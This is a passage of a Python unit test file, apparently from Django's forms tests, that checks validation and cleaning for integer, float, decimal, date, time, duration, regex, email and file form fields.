def test_charfield_strip(self):
"""
Ensure that values have whitespace stripped and that strip=False works.
"""
f = CharField()
self.assertEqual(f.clean(' 1'), '1')
self.assertEqual(f.clean('1 '), '1')
f = CharField(strip=False)
self.assertEqual(f.clean(' 1'), ' 1')
self.assertEqual(f.clean('1 '), '1 ')
def test_charfield_disabled(self):
f = CharField(disabled=True)
self.assertWidgetRendersTo(f, '<input type="text" name="f" id="id_f" disabled />')
# IntegerField ################################################################
def test_integerfield_1(self):
f = IntegerField()
self.assertWidgetRendersTo(f, '<input type="number" name="f" id="id_f" />')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertEqual(1, f.clean('1'))
self.assertIsInstance(f.clean('1'), int)
self.assertEqual(23, f.clean('23'))
self.assertRaisesMessage(ValidationError, "'Enter a whole number.'", f.clean, 'a')
self.assertEqual(42, f.clean(42))
self.assertRaisesMessage(ValidationError, "'Enter a whole number.'", f.clean, 3.14)
self.assertEqual(1, f.clean('1 '))
self.assertEqual(1, f.clean(' 1'))
self.assertEqual(1, f.clean(' 1 '))
self.assertRaisesMessage(ValidationError, "'Enter a whole number.'", f.clean, '1a')
self.assertEqual(f.max_value, None)
self.assertEqual(f.min_value, None)
def test_integerfield_2(self):
f = IntegerField(required=False)
self.assertIsNone(f.clean(''))
self.assertEqual('None', repr(f.clean('')))
self.assertIsNone(f.clean(None))
self.assertEqual('None', repr(f.clean(None)))
self.assertEqual(1, f.clean('1'))
self.assertIsInstance(f.clean('1'), int)
self.assertEqual(23, f.clean('23'))
self.assertRaisesMessage(ValidationError, "'Enter a whole number.'", f.clean, 'a')
self.assertEqual(1, f.clean('1 '))
self.assertEqual(1, f.clean(' 1'))
self.assertEqual(1, f.clean(' 1 '))
self.assertRaisesMessage(ValidationError, "'Enter a whole number.'", f.clean, '1a')
self.assertEqual(f.max_value, None)
self.assertEqual(f.min_value, None)
def test_integerfield_3(self):
f = IntegerField(max_value=10)
self.assertWidgetRendersTo(f, '<input max="10" type="number" name="f" id="id_f" />')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertEqual(1, f.clean(1))
self.assertEqual(10, f.clean(10))
self.assertRaisesMessage(ValidationError, "'Ensure this value is less than or equal to 10.'", f.clean, 11)
self.assertEqual(10, f.clean('10'))
self.assertRaisesMessage(ValidationError, "'Ensure this value is less than or equal to 10.'", f.clean, '11')
self.assertEqual(f.max_value, 10)
self.assertEqual(f.min_value, None)
def test_integerfield_4(self):
f = IntegerField(min_value=10)
self.assertWidgetRendersTo(f, '<input id="id_f" type="number" name="f" min="10" />')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertRaisesMessage(ValidationError, "'Ensure this value is greater than or equal to 10.'", f.clean, 1)
self.assertEqual(10, f.clean(10))
self.assertEqual(11, f.clean(11))
self.assertEqual(10, f.clean('10'))
self.assertEqual(11, f.clean('11'))
self.assertEqual(f.max_value, None)
self.assertEqual(f.min_value, 10)
def test_integerfield_5(self):
f = IntegerField(min_value=10, max_value=20)
self.assertWidgetRendersTo(f, '<input id="id_f" max="20" type="number" name="f" min="10" />')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertRaisesMessage(ValidationError, "'Ensure this value is greater than or equal to 10.'", f.clean, 1)
self.assertEqual(10, f.clean(10))
self.assertEqual(11, f.clean(11))
self.assertEqual(10, f.clean('10'))
self.assertEqual(11, f.clean('11'))
self.assertEqual(20, f.clean(20))
self.assertRaisesMessage(ValidationError, "'Ensure this value is less than or equal to 20.'", f.clean, 21)
self.assertEqual(f.max_value, 20)
self.assertEqual(f.min_value, 10)
def test_integerfield_localized(self):
"""
        Make sure a localized IntegerField's widget renders to a text input
        without any number-input-specific attributes.
"""
f1 = IntegerField(localize=True)
self.assertWidgetRendersTo(f1, '<input id="id_f" name="f" type="text" />')
def test_integerfield_float(self):
f = IntegerField()
self.assertEqual(1, f.clean(1.0))
self.assertEqual(1, f.clean('1.0'))
self.assertEqual(1, f.clean(' 1.0 '))
self.assertEqual(1, f.clean('1.'))
self.assertEqual(1, f.clean(' 1. '))
self.assertRaisesMessage(ValidationError, "'Enter a whole number.'", f.clean, '1.5')
self.assertRaisesMessage(ValidationError, "'Enter a whole number.'", f.clean, '…')
def test_integerfield_big_num(self):
f = IntegerField()
self.assertEqual(9223372036854775808, f.clean(9223372036854775808))
self.assertEqual(9223372036854775808, f.clean('9223372036854775808'))
self.assertEqual(9223372036854775808, f.clean('9223372036854775808.0'))
def test_integerfield_subclass(self):
"""
Test that class-defined widget is not overwritten by __init__ (#22245).
"""
class MyIntegerField(IntegerField):
widget = Textarea
f = MyIntegerField()
self.assertEqual(f.widget.__class__, Textarea)
f = MyIntegerField(localize=True)
self.assertEqual(f.widget.__class__, Textarea)
# FloatField ##################################################################
def test_floatfield_1(self):
f = FloatField()
self.assertWidgetRendersTo(f, '<input step="any" type="number" name="f" id="id_f" />')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertEqual(1.0, f.clean('1'))
self.assertIsInstance(f.clean('1'), float)
self.assertEqual(23.0, f.clean('23'))
self.assertEqual(3.1400000000000001, f.clean('3.14'))
self.assertEqual(3.1400000000000001, f.clean(3.14))
self.assertEqual(42.0, f.clean(42))
self.assertRaisesMessage(ValidationError, "'Enter a number.'", f.clean, 'a')
self.assertEqual(1.0, f.clean('1.0 '))
self.assertEqual(1.0, f.clean(' 1.0'))
self.assertEqual(1.0, f.clean(' 1.0 '))
self.assertRaisesMessage(ValidationError, "'Enter a number.'", f.clean, '1.0a')
self.assertEqual(f.max_value, None)
self.assertEqual(f.min_value, None)
self.assertRaisesMessage(ValidationError, "'Enter a number.'", f.clean, 'Infinity')
self.assertRaisesMessage(ValidationError, "'Enter a number.'", f.clean, 'NaN')
self.assertRaisesMessage(ValidationError, "'Enter a number.'", f.clean, '-Inf')
def test_floatfield_2(self):
f = FloatField(required=False)
self.assertIsNone(f.clean(''))
self.assertIsNone(f.clean(None))
self.assertEqual(1.0, f.clean('1'))
self.assertEqual(f.max_value, None)
self.assertEqual(f.min_value, None)
def test_floatfield_3(self):
f = FloatField(max_value=1.5, min_value=0.5)
self.assertWidgetRendersTo(f, '<input step="any" name="f" min="0.5" max="1.5" type="number" id="id_f" />')
self.assertRaisesMessage(ValidationError, "'Ensure this value is less than or equal to 1.5.'", f.clean, '1.6')
self.assertRaisesMessage(
ValidationError, "'Ensure this value is greater than or equal to 0.5.'",
f.clean, '0.4'
)
self.assertEqual(1.5, f.clean('1.5'))
self.assertEqual(0.5, f.clean('0.5'))
self.assertEqual(f.max_value, 1.5)
self.assertEqual(f.min_value, 0.5)
def test_floatfield_widget_attrs(self):
f = FloatField(widget=NumberInput(attrs={'step': 0.01, 'max': 1.0, 'min': 0.0}))
self.assertWidgetRendersTo(f, '<input step="0.01" name="f" min="0.0" max="1.0" type="number" id="id_f" />')
def test_floatfield_localized(self):
"""
        Make sure a localized FloatField's widget renders to a text input
        without any number-input-specific attributes.
"""
f = FloatField(localize=True)
self.assertWidgetRendersTo(f, '<input id="id_f" name="f" type="text" />')
def test_floatfield_changed(self):
f = FloatField()
n = 4.35
self.assertFalse(f.has_changed(n, '4.3500'))
with translation.override('fr'), self.settings(USE_L10N=True):
f = FloatField(localize=True)
localized_n = formats.localize_input(n) # -> '4,35' in French
self.assertFalse(f.has_changed(n, localized_n))
# DecimalField ################################################################
def test_decimalfield_1(self):
f = DecimalField(max_digits=4, decimal_places=2)
self.assertWidgetRendersTo(f, '<input id="id_f" step="0.01" type="number" name="f" />')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertEqual(f.clean('1'), Decimal("1"))
self.assertIsInstance(f.clean('1'), Decimal)
self.assertEqual(f.clean('23'), Decimal("23"))
self.assertEqual(f.clean('3.14'), Decimal("3.14"))
self.assertEqual(f.clean(3.14), Decimal("3.14"))
self.assertEqual(f.clean(Decimal('3.14')), Decimal("3.14"))
self.assertRaisesMessage(ValidationError, "'Enter a number.'", f.clean, 'NaN')
self.assertRaisesMessage(ValidationError, "'Enter a number.'", f.clean, 'Inf')
self.assertRaisesMessage(ValidationError, "'Enter a number.'", f.clean, '-Inf')
self.assertRaisesMessage(ValidationError, "'Enter a number.'", f.clean, 'a')
self.assertRaisesMessage(ValidationError, "'Enter a number.'", f.clean, 'łąść')
self.assertEqual(f.clean('1.0 '), Decimal("1.0"))
self.assertEqual(f.clean(' 1.0'), Decimal("1.0"))
self.assertEqual(f.clean(' 1.0 '), Decimal("1.0"))
self.assertRaisesMessage(ValidationError, "'Enter a number.'", f.clean, '1.0a')
self.assertRaisesMessage(
ValidationError, "'Ensure that there are no more than 4 digits in total.'",
f.clean, '123.45'
)
self.assertRaisesMessage(
ValidationError, "'Ensure that there are no more than 2 decimal places.'",
f.clean, '1.234'
)
self.assertRaisesMessage(
ValidationError, "'Ensure that there are no more than 2 digits before the decimal point.'",
f.clean, '123.4'
)
self.assertEqual(f.clean('-12.34'), Decimal("-12.34"))
self.assertRaisesMessage(
ValidationError, "'Ensure that there are no more than 4 digits in total.'",
f.clean, '-123.45'
)
self.assertEqual(f.clean('-.12'), Decimal("-0.12"))
self.assertEqual(f.clean('-00.12'), Decimal("-0.12"))
self.assertEqual(f.clean('-000.12'), Decimal("-0.12"))
self.assertRaisesMessage(
ValidationError, "'Ensure that there are no more than 2 decimal places.'",
f.clean, '-000.123'
)
self.assertRaisesMessage(
ValidationError, "'Ensure that there are no more than 4 digits in total.'",
f.clean, '-000.12345'
)
self.assertRaisesMessage(ValidationError, "'Enter a number.'", f.clean, '--0.12')
self.assertEqual(f.max_digits, 4)
self.assertEqual(f.decimal_places, 2)
self.assertEqual(f.max_value, None)
self.assertEqual(f.min_value, None)
def test_decimalfield_2(self):
f = DecimalField(max_digits=4, decimal_places=2, required=False)
self.assertIsNone(f.clean(''))
self.assertIsNone(f.clean(None))
self.assertEqual(f.clean('1'), Decimal("1"))
self.assertEqual(f.max_digits, 4)
self.assertEqual(f.decimal_places, 2)
self.assertEqual(f.max_value, None)
self.assertEqual(f.min_value, None)
def test_decimalfield_3(self):
f = DecimalField(max_digits=4, decimal_places=2, max_value=Decimal('1.5'), min_value=Decimal('0.5'))
self.assertWidgetRendersTo(f, '<input step="0.01" name="f" min="0.5" max="1.5" type="number" id="id_f" />')
self.assertRaisesMessage(ValidationError, "'Ensure this value is less than or equal to 1.5.'", f.clean, '1.6')
self.assertRaisesMessage(
ValidationError, "'Ensure this value is greater than or equal to 0.5.'",
f.clean, '0.4'
)
self.assertEqual(f.clean('1.5'), Decimal("1.5"))
self.assertEqual(f.clean('0.5'), Decimal("0.5"))
self.assertEqual(f.clean('.5'), Decimal("0.5"))
self.assertEqual(f.clean('00.50'), Decimal("0.50"))
self.assertEqual(f.max_digits, 4)
self.assertEqual(f.decimal_places, 2)
self.assertEqual(f.max_value, Decimal('1.5'))
self.assertEqual(f.min_value, Decimal('0.5'))
def test_decimalfield_4(self):
f = DecimalField(decimal_places=2)
self.assertRaisesMessage(
ValidationError, "'Ensure that there are no more than 2 decimal places.'",
f.clean, '0.00000001'
)
def test_decimalfield_5(self):
f = DecimalField(max_digits=3)
# Leading whole zeros "collapse" to one digit.
self.assertEqual(f.clean('0000000.10'), Decimal("0.1"))
# But a leading 0 before the . doesn't count towards max_digits
self.assertEqual(f.clean('0000000.100'), Decimal("0.100"))
# Only leading whole zeros "collapse" to one digit.
self.assertEqual(f.clean('000000.02'), Decimal('0.02'))
self.assertRaisesMessage(
ValidationError, "'Ensure that there are no more than 3 digits in total.'",
f.clean, '000000.0002'
)
self.assertEqual(f.clean('.002'), Decimal("0.002"))
def test_decimalfield_6(self):
f = DecimalField(max_digits=2, decimal_places=2)
self.assertEqual(f.clean('.01'), Decimal(".01"))
self.assertRaisesMessage(
ValidationError, "'Ensure that there are no more than 0 digits before the decimal point.'",
f.clean, '1.1'
)
def test_decimalfield_scientific(self):
f = DecimalField(max_digits=2, decimal_places=2)
self.assertEqual(f.clean('1E+2'), Decimal('1E+2'))
self.assertEqual(f.clean('1e+2'), Decimal('1E+2'))
with self.assertRaisesMessage(ValidationError, "Ensure that there are no more"):
f.clean('0.546e+2')
def test_decimalfield_widget_attrs(self):
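        # A note on the expectations below: NumberInput's step is derived from
        # decimal_places as 10 ** -decimal_places (rendered '0.01', '1', '1e-19',
        # ...) and falls back to 'any' when decimal_places is left unspecified.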
f = DecimalField(max_digits=6, decimal_places=2)
self.assertEqual(f.widget_attrs(Widget()), {})
self.assertEqual(f.widget_attrs(NumberInput()), {'step': '0.01'})
f = DecimalField(max_digits=10, decimal_places=0)
self.assertEqual(f.widget_attrs(NumberInput()), {'step': '1'})
f = DecimalField(max_digits=19, decimal_places=19)
self.assertEqual(f.widget_attrs(NumberInput()), {'step': '1e-19'})
f = DecimalField(max_digits=20)
self.assertEqual(f.widget_attrs(NumberInput()), {'step': 'any'})
f = DecimalField(max_digits=6, widget=NumberInput(attrs={'step': '0.01'}))
self.assertWidgetRendersTo(f, '<input step="0.01" name="f" type="number" id="id_f" />')
def test_decimalfield_localized(self):
"""
        Make sure a localized DecimalField's widget renders to a text input
        without any number-input-specific attributes.
"""
f = DecimalField(localize=True)
self.assertWidgetRendersTo(f, '<input id="id_f" name="f" type="text" />')
def test_decimalfield_changed(self):
f = DecimalField(max_digits=2, decimal_places=2)
d = Decimal("0.1")
self.assertFalse(f.has_changed(d, '0.10'))
self.assertTrue(f.has_changed(d, '0.101'))
with translation.override('fr'), self.settings(USE_L10N=True):
f = DecimalField(max_digits=2, decimal_places=2, localize=True)
localized_d = formats.localize_input(d) # -> '0,1' in French
self.assertFalse(f.has_changed(d, localized_d))
# DateField ###################################################################
def test_datefield_1(self):
f = DateField()
self.assertEqual(datetime.date(2006, 10, 25), f.clean(datetime.date(2006, 10, 25)))
self.assertEqual(datetime.date(2006, 10, 25), f.clean(datetime.datetime(2006, 10, 25, 14, 30)))
self.assertEqual(datetime.date(2006, 10, 25), f.clean(datetime.datetime(2006, 10, 25, 14, 30, 59)))
self.assertEqual(datetime.date(2006, 10, 25), f.clean(datetime.datetime(2006, 10, 25, 14, 30, 59, 200)))
self.assertEqual(datetime.date(2006, 10, 25), f.clean('2006-10-25'))
self.assertEqual(datetime.date(2006, 10, 25), f.clean('10/25/2006'))
self.assertEqual(datetime.date(2006, 10, 25), f.clean('10/25/06'))
self.assertEqual(datetime.date(2006, 10, 25), f.clean('Oct 25 2006'))
self.assertEqual(datetime.date(2006, 10, 25), f.clean('October 25 2006'))
self.assertEqual(datetime.date(2006, 10, 25), f.clean('October 25, 2006'))
self.assertEqual(datetime.date(2006, 10, 25), f.clean('25 October 2006'))
self.assertEqual(datetime.date(2006, 10, 25), f.clean('25 October, 2006'))
self.assertRaisesMessage(ValidationError, "'Enter a valid date.'", f.clean, '2006-4-31')
self.assertRaisesMessage(ValidationError, "'Enter a valid date.'", f.clean, '200a-10-25')
self.assertRaisesMessage(ValidationError, "'Enter a valid date.'", f.clean, '25/10/06')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
def test_datefield_2(self):
f = DateField(required=False)
self.assertIsNone(f.clean(None))
self.assertEqual('None', repr(f.clean(None)))
self.assertIsNone(f.clean(''))
self.assertEqual('None', repr(f.clean('')))
def test_datefield_3(self):
f = DateField(input_formats=['%Y %m %d'])
self.assertEqual(datetime.date(2006, 10, 25), f.clean(datetime.date(2006, 10, 25)))
self.assertEqual(datetime.date(2006, 10, 25), f.clean(datetime.datetime(2006, 10, 25, 14, 30)))
self.assertEqual(datetime.date(2006, 10, 25), f.clean('2006 10 25'))
self.assertRaisesMessage(ValidationError, "'Enter a valid date.'", f.clean, '2006-10-25')
self.assertRaisesMessage(ValidationError, "'Enter a valid date.'", f.clean, '10/25/2006')
self.assertRaisesMessage(ValidationError, "'Enter a valid date.'", f.clean, '10/25/06')
def test_datefield_4(self):
# Test whitespace stripping behavior (#5714)
f = DateField()
self.assertEqual(datetime.date(2006, 10, 25), f.clean(' 10/25/2006 '))
self.assertEqual(datetime.date(2006, 10, 25), f.clean(' 10/25/06 '))
self.assertEqual(datetime.date(2006, 10, 25), f.clean(' Oct 25 2006 '))
self.assertEqual(datetime.date(2006, 10, 25), f.clean(' October 25 2006 '))
self.assertEqual(datetime.date(2006, 10, 25), f.clean(' October 25, 2006 '))
self.assertEqual(datetime.date(2006, 10, 25), f.clean(' 25 October 2006 '))
self.assertRaisesMessage(ValidationError, "'Enter a valid date.'", f.clean, ' ')
def test_datefield_5(self):
# Test null bytes (#18982)
f = DateField()
self.assertRaisesMessage(ValidationError, "'Enter a valid date.'", f.clean, 'a\x00b')
def test_datefield_changed(self):
format = '%d/%m/%Y'
f = DateField(input_formats=[format])
d = datetime.date(2007, 9, 17)
self.assertFalse(f.has_changed(d, '17/09/2007'))
def test_datefield_strptime(self):
"""Test that field.strptime doesn't raise an UnicodeEncodeError (#16123)"""
f = DateField()
try:
f.strptime('31 мая 2011', '%d-%b-%y')
except Exception as e:
# assertIsInstance or assertRaises cannot be used because UnicodeEncodeError
# is a subclass of ValueError
self.assertEqual(e.__class__, ValueError)
# TimeField ###################################################################
def test_timefield_1(self):
f = TimeField()
self.assertEqual(datetime.time(14, 25), f.clean(datetime.time(14, 25)))
self.assertEqual(datetime.time(14, 25, 59), f.clean(datetime.time(14, 25, 59)))
self.assertEqual(datetime.time(14, 25), f.clean('14:25'))
self.assertEqual(datetime.time(14, 25, 59), f.clean('14:25:59'))
self.assertRaisesMessage(ValidationError, "'Enter a valid time.'", f.clean, 'hello')
self.assertRaisesMessage(ValidationError, "'Enter a valid time.'", f.clean, '1:24 p.m.')
def test_timefield_2(self):
f = TimeField(input_formats=['%I:%M %p'])
self.assertEqual(datetime.time(14, 25), f.clean(datetime.time(14, 25)))
self.assertEqual(datetime.time(14, 25, 59), f.clean(datetime.time(14, 25, 59)))
self.assertEqual(datetime.time(4, 25), f.clean('4:25 AM'))
self.assertEqual(datetime.time(16, 25), f.clean('4:25 PM'))
self.assertRaisesMessage(ValidationError, "'Enter a valid time.'", f.clean, '14:30:45')
def test_timefield_3(self):
f = TimeField()
# Test whitespace stripping behavior (#5714)
self.assertEqual(datetime.time(14, 25), f.clean(' 14:25 '))
self.assertEqual(datetime.time(14, 25, 59), f.clean(' 14:25:59 '))
self.assertRaisesMessage(ValidationError, "'Enter a valid time.'", f.clean, ' ')
def test_timefield_changed(self):
t1 = datetime.time(12, 51, 34, 482548)
t2 = datetime.time(12, 51)
f = TimeField(input_formats=['%H:%M', '%H:%M %p'])
self.assertTrue(f.has_changed(t1, '12:51'))
self.assertFalse(f.has_changed(t2, '12:51'))
self.assertFalse(f.has_changed(t2, '12:51 PM'))
# DateTimeField ###############################################################
def test_datetimefield_1(self):
f = DateTimeField()
self.assertEqual(datetime.datetime(2006, 10, 25, 0, 0), f.clean(datetime.date(2006, 10, 25)))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30), f.clean(datetime.datetime(2006, 10, 25, 14, 30)))
self.assertEqual(
datetime.datetime(2006, 10, 25, 14, 30, 59),
f.clean(datetime.datetime(2006, 10, 25, 14, 30, 59))
)
self.assertEqual(
datetime.datetime(2006, 10, 25, 14, 30, 59, 200),
f.clean(datetime.datetime(2006, 10, 25, 14, 30, 59, 200))
)
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45, 200), f.clean('2006-10-25 14:30:45.000200'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45, 200), f.clean('2006-10-25 14:30:45.0002'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45), f.clean('2006-10-25 14:30:45'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30), f.clean('2006-10-25 14:30:00'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30), f.clean('2006-10-25 14:30'))
self.assertEqual(datetime.datetime(2006, 10, 25, 0, 0), f.clean('2006-10-25'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45, 200), f.clean('10/25/2006 14:30:45.000200'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45), f.clean('10/25/2006 14:30:45'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30), f.clean('10/25/2006 14:30:00'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30), f.clean('10/25/2006 14:30'))
self.assertEqual(datetime.datetime(2006, 10, 25, 0, 0), f.clean('10/25/2006'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45, 200), f.clean('10/25/06 14:30:45.000200'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45), f.clean('10/25/06 14:30:45'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30), f.clean('10/25/06 14:30:00'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30), f.clean('10/25/06 14:30'))
self.assertEqual(datetime.datetime(2006, 10, 25, 0, 0), f.clean('10/25/06'))
self.assertRaisesMessage(ValidationError, "'Enter a valid date/time.'", f.clean, 'hello')
self.assertRaisesMessage(ValidationError, "'Enter a valid date/time.'", f.clean, '2006-10-25 4:30 p.m.')
def test_datetimefield_2(self):
f = DateTimeField(input_formats=['%Y %m %d %I:%M %p'])
self.assertEqual(datetime.datetime(2006, 10, 25, 0, 0), f.clean(datetime.date(2006, 10, 25)))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30), f.clean(datetime.datetime(2006, 10, 25, 14, 30)))
self.assertEqual(
datetime.datetime(2006, 10, 25, 14, 30, 59),
f.clean(datetime.datetime(2006, 10, 25, 14, 30, 59))
)
self.assertEqual(
datetime.datetime(2006, 10, 25, 14, 30, 59, 200),
f.clean(datetime.datetime(2006, 10, 25, 14, 30, 59, 200))
)
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30), f.clean('2006 10 25 2:30 PM'))
self.assertRaisesMessage(ValidationError, "'Enter a valid date/time.'", f.clean, '2006-10-25 14:30:45')
def test_datetimefield_3(self):
f = DateTimeField(required=False)
self.assertIsNone(f.clean(None))
self.assertEqual('None', repr(f.clean(None)))
self.assertIsNone(f.clean(''))
self.assertEqual('None', repr(f.clean('')))
def test_datetimefield_4(self):
f = DateTimeField()
# Test whitespace stripping behavior (#5714)
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45), f.clean(' 2006-10-25 14:30:45 '))
self.assertEqual(datetime.datetime(2006, 10, 25, 0, 0), f.clean(' 2006-10-25 '))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45), f.clean(' 10/25/2006 14:30:45 '))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30), f.clean(' 10/25/2006 14:30 '))
self.assertEqual(datetime.datetime(2006, 10, 25, 0, 0), f.clean(' 10/25/2006 '))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45), f.clean(' 10/25/06 14:30:45 '))
self.assertEqual(datetime.datetime(2006, 10, 25, 0, 0), f.clean(' 10/25/06 '))
self.assertRaisesMessage(ValidationError, "'Enter a valid date/time.'", f.clean, ' ')
def test_datetimefield_5(self):
f = DateTimeField(input_formats=['%Y.%m.%d %H:%M:%S.%f'])
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45, 200), f.clean('2006.10.25 14:30:45.0002'))
def test_datetimefield_changed(self):
format = '%Y %m %d %I:%M %p'
f = DateTimeField(input_formats=[format])
d = datetime.datetime(2006, 9, 17, 14, 30, 0)
self.assertFalse(f.has_changed(d, '2006 09 17 2:30 PM'))
# DurationField ###########################################################
def test_durationfield_1(self):
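        # DurationField parses via django.utils.dateparse.parse_duration, which
        # accepts strings shaped roughly like "[DD] [HH:[MM:]]ss[.uuuuuu]"; the
        # cases below exercise bare seconds, MM:SS, H:MM:SS, and D H:MM:SS.f.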
f = DurationField()
self.assertEqual(datetime.timedelta(seconds=30), f.clean('30'))
self.assertEqual(
datetime.timedelta(minutes=15, seconds=30),
f.clean('15:30')
)
self.assertEqual(
datetime.timedelta(hours=1, minutes=15, seconds=30),
f.clean('1:15:30')
)
self.assertEqual(
datetime.timedelta(
days=1, hours=1, minutes=15, seconds=30, milliseconds=300),
f.clean('1 1:15:30.3')
)
def test_durationfield_2(self):
class DurationForm(Form):
duration = DurationField(initial=datetime.timedelta(hours=1))
f = DurationForm()
self.assertHTMLEqual(
'<input id="id_duration" type="text" name="duration" value="01:00:00">',
str(f['duration'])
)
def test_durationfield_prepare_value(self):
field = DurationField()
td = datetime.timedelta(minutes=15, seconds=30)
self.assertEqual(field.prepare_value(td), duration_string(td))
self.assertEqual(field.prepare_value('arbitrary'), 'arbitrary')
self.assertIsNone(field.prepare_value(None))
# RegexField ##################################################################
def test_regexfield_1(self):
f = RegexField('^[0-9][A-F][0-9]$')
self.assertEqual('2A2', f.clean('2A2'))
self.assertEqual('3F3', f.clean('3F3'))
self.assertRaisesMessage(ValidationError, "'Enter a valid value.'", f.clean, '3G3')
self.assertRaisesMessage(ValidationError, "'Enter a valid value.'", f.clean, ' 2A2')
self.assertRaisesMessage(ValidationError, "'Enter a valid value.'", f.clean, '2A2 ')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
def test_regexfield_2(self):
f = RegexField('^[0-9][A-F][0-9]$', required=False)
self.assertEqual('2A2', f.clean('2A2'))
self.assertEqual('3F3', f.clean('3F3'))
self.assertRaisesMessage(ValidationError, "'Enter a valid value.'", f.clean, '3G3')
self.assertEqual('', f.clean(''))
def test_regexfield_3(self):
f = RegexField(re.compile('^[0-9][A-F][0-9]$'))
self.assertEqual('2A2', f.clean('2A2'))
self.assertEqual('3F3', f.clean('3F3'))
self.assertRaisesMessage(ValidationError, "'Enter a valid value.'", f.clean, '3G3')
self.assertRaisesMessage(ValidationError, "'Enter a valid value.'", f.clean, ' 2A2')
self.assertRaisesMessage(ValidationError, "'Enter a valid value.'", f.clean, '2A2 ')
def test_regexfield_5(self):
f = RegexField('^[0-9]+$', min_length=5, max_length=10)
self.assertRaisesMessage(
ValidationError, "'Ensure this value has at least 5 characters (it has 3).'",
f.clean, '123'
)
six.assertRaisesRegex(
self, ValidationError,
"'Ensure this value has at least 5 characters \(it has 3\)\.',"
" u?'Enter a valid value\.'",
f.clean, 'abc'
)
self.assertEqual('12345', f.clean('12345'))
self.assertEqual('1234567890', f.clean('1234567890'))
self.assertRaisesMessage(
ValidationError, "'Ensure this value has at most 10 characters (it has 11).'",
f.clean, '12345678901'
)
self.assertRaisesMessage(ValidationError, "'Enter a valid value.'", f.clean, '12345a')
def test_regexfield_6(self):
"""
        Ensure that RegexField works with unicode characters.
Refs #.
"""
        f = RegexField(r'^\w+$')
self.assertEqual('éèøçÎÎ你好', f.clean('éèøçÎÎ你好'))
def test_change_regex_after_init(self):
f = RegexField('^[a-z]+$')
f.regex = '^[0-9]+$'
self.assertEqual('1234', f.clean('1234'))
self.assertRaisesMessage(ValidationError, "'Enter a valid value.'", f.clean, 'abcd')
# EmailField ##################################################################
# See also validators tests for validate_email specific tests
def test_emailfield_1(self):
f = EmailField()
self.assertWidgetRendersTo(f, '<input type="email" name="f" id="id_f" />')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
        self.assertEqual('[email protected]', f.clean('[email protected]'))
        self.assertRaisesMessage(ValidationError, "'Enter a valid email address.'", f.clean, 'foo')
        self.assertEqual(
            'local@domain.with.idn.xyz\xe4\xf6\xfc\xdfabc.part.com',
            f.clean('local@domain.with.idn.xyzäöüßabc.part.com')
        )
def test_email_regexp_for_performance(self):
f = EmailField()
        # Check for a runaway-regex security problem. This will take practically
        # forever if the security fix isn't in place.
        addr = 'viewx3dtextx26qx3d@yahoo.comx26latlngx3d15854521645943074058'
self.assertEqual(addr, f.clean(addr))
def test_emailfield_not_required(self):
f = EmailField(required=False)
self.assertEqual('', f.clean(''))
self.assertEqual('', f.clean(None))
        self.assertEqual('[email protected]', f.clean('[email protected]'))
        self.assertEqual('[email protected]', f.clean(' [email protected] \t \t '))
self.assertRaisesMessage(ValidationError, "'Enter a valid email address.'", f.clean, 'foo')
def test_emailfield_min_max_length(self):
f = EmailField(min_length=10, max_length=15)
self.assertWidgetRendersTo(f, '<input id="id_f" type="email" name="f" maxlength="15" />')
        self.assertRaisesMessage(
            ValidationError, "'Ensure this value has at least 10 characters (it has 9).'",
            f.clean, '[email protected]'
        )
        self.assertEqual('[email protected]', f.clean('[email protected]'))
        self.assertRaisesMessage(
            ValidationError, "'Ensure this value has at most 15 characters (it has 20).'",
            f.clean, '[email protected]'
        )
# FileField ##################################################################
def test_filefield_1(self):
f = FileField()
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '', '')
self.assertEqual('files/test1.pdf', f.clean('', 'files/test1.pdf'))
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None, '')
self.assertEqual('files/test2.pdf', f.clean(None, 'files/test2.pdf'))
self.assertRaisesMessage(
ValidationError, "'No file was submitted. Check the encoding type on the form.'",
f.clean, SimpleUploadedFile('', b'')
)
self.assertRaisesMessage(
ValidationError, "'No file was submitted. Check the encoding type on the form.'",
f.clean, SimpleUploadedFile('', b''), ''
)
self.assertEqual('files/test3.pdf', f.clean(None, 'files/test3.pdf'))
self.assertRaisesMessage(
